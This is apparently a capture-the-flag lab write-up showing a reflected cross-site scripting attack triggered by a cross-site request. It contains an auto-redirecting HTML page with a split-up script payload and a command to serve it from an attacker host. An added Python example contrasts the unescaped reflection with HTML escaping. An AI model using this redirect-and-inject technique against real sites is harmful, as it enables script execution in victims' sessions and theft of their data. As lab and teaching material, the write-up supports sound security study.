Triggering XSS through CSRF
index.html:
<!DOCTYPE html>
<html>
<body onload="window.location='http://challenge.localhost/ephemeral?msg='+'<'+'script>alert(&quot;PWNED&quot;)</script'+'>'"></body>
</html>
Run in the directory of index.html:
python3 -m http.server 1337 --bind hacker.localhost
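
Server-side view of the same request, as an added example that is not part of the original notes. It assumes the /ephemeral handler places msg into the HTML response unescaped (the page does not show the server code) and compares that with an HTML-escaped response for the exact URL index.html navigates to. The function names are hypothetical.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qs

# The URL that index.html sends the browser to (taken from the page).
TARGET = 'http://challenge.localhost/ephemeral?msg=<script>alert("PWNED")</script>'


def extract_msg(url):
    """Return the msg query parameter as the server would receive it."""
    query = urlsplit(url).query
    return parse_qs(query).get("msg", [""])[0]


def render_reflected(msg):
    """Assumed vulnerable handler: msg is concatenated into HTML unescaped."""
    return "<html><body><p>Message: " + msg + "</p></body></html>"


def render_escaped(msg):
    """Hardened handler: msg is HTML-escaped before it reaches the page."""
    return "<html><body><p>Message: " + html.escape(msg, quote=True) + "</p></body></html>"


class ScriptCounter(HTMLParser):
    """Counts <script> start tags that an HTML parser sees in a response."""

    def __init__(self):
        super().__init__()
        self.scripts = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts += 1


def count_scripts(page):
    parser = ScriptCounter()
    parser.feed(page)
    parser.close()
    return parser.scripts


if __name__ == "__main__":
    msg = extract_msg(TARGET)
    print("reflected:", count_scripts(render_reflected(msg)))
    print("escaped:  ", count_scripts(render_escaped(msg)))
```

With the reflected response the parser sees a script element in the challenge.localhost origin; with the escaped response the same msg arrives as inert text.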